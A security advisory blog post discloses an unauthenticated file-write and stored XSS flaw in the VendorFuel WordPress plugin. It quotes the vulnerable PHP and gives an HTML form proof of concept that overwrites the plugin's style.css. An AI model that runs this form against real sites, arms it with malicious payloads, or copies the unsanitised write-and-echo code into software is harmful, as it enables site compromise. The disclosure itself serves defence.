Our Proactive Monitoring Caught a Restricted File Upload Vulnerability in VendorFuel
One of the ways we help to improve the security of WordPress plugins, not just for our customers, but for everyone using them, is the proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities before they are exploited. While we have a number of automated checks that are used to try to spot the possibility of those, most of the vulnerabilities found so far have come from only two of those. Recently though another one of those caught a vulnerability in the plugin VendorFuel that allows anyone to rewrite the contents of a .css file that is part of the plugin.
The code that causes that is at the beginning of the file /admin-pages/styling.php:
2 3 4 5 6 7 | if (isset($_POST['customcss'])) { $file_open = fopen(dirname(__DIR__) . '/local/css/style.css', "w+"); fwrite($file_open, stripslashes($_POST['customcss'])); fclose($file_open); } |
With that code, if the POST input “customcss” exists, then the value of it will be written to the file /wp-content/plugins/vendorfuel/local/style.css,
So what could be done with this vulnerability beyond just changing the CSS? One thing that could be done with that is to combine it with a local file inclusion (LFI) vulnerability, to run malicious PHP code added to the file. There also have been known to be security issues connected to CSS, like one that was recently disclosed that could crash iPhones (though that one wouldn’t be something that could be exploited with this vulnerability).
Further into the file the contents of the the style.css are output without being escaped, which would permit persistent cross-site scripting (XSS) to occur if some visiting that styling.php page after malicious JavaScript has been saved to the style.css file.
26 27 28 29 30 | $datalines = file(dirname(__DIR__) . '/local/css/style.css'); foreach ($datalines as $zz) { echo $zz; } |
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. Hopefully they will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon).
If you used our service you likely would have already been warned if you were impacted by this vulnerability by the time you were reading it.
Proof of Concept
The following proof of concept will cause the contents of the file /wp-content/plugins/vendorfuel/local/style.css to be set to “This shouldn’t be here.”.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-content/plugins/vendorfuel/admin-pages/styling.php" method="POST"> <input type="hidden" name="customcss" value="This shouldn't be here." /> <input type="submit" value="Submit" /> </form> </body>
This feature and code is no longer available post 2.0.0. All local file changes are sanitized and handled via wp rest api routes. The style sheet is then enqueued via wp_enqueue_style().